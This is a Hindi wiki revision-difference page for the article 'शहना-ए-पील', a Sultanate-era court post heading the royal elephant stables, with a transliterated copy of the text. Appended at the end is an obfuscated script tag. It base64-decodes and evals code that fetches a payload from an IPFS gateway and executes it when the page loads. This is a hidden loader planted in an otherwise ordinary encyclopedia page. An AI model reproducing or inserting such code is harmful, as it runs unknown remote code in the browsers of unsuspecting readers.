Difference between revisions of "शहना-ए-पील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''शहना-ए-पील''' भारत के इतिहास में [[सल्...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
'''शहना-ए-पील''' [[भारत का इतिहास|भारत के इतिहास]] में [[सल्तनत काल]] में राज दरबार से सम्बन्धित पद था।  
 
'''शहना-ए-पील''' [[भारत का इतिहास|भारत के इतिहास]] में [[सल्तनत काल]] में राज दरबार से सम्बन्धित पद था।  
 +
* इस पद का पदाधिकारी हस्तिशाला का अध्यक्ष होता था।
 +
* [[हाथी]] को [[फ़ारसी भाषा|फ़ारसी]] में 'पील' कहते हैं जिसका उच्चारण [[उर्दू]] में 'फ़ील' होता है।
  
इस पद का पदाधिकारी हस्तिशाला का अध्यक्ष होता था।
 
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
Line 15: Line 16:
 
[[Category:प्राचीन शासन-प्रशासन]]
 
[[Category:प्राचीन शासन-प्रशासन]]
 
__INDEX__
 
__INDEX__
 +
 +
{{सुलेख}}

Revision as of 13:45, 9 September 2011

shahana-e-pil bharat ke itihas mean saltanat kal mean raj darabar se sambandhit pad tha.

  • is pad ka padadhikari hastishala ka adhyaksh hota tha.
  • hathi ko farasi mean 'pil' kahate haian jisaka uchcharan urdoo mean 'fil' hota hai.


tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh


suvyavasthit lekh|link=bharatakosh:suvyavasthit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>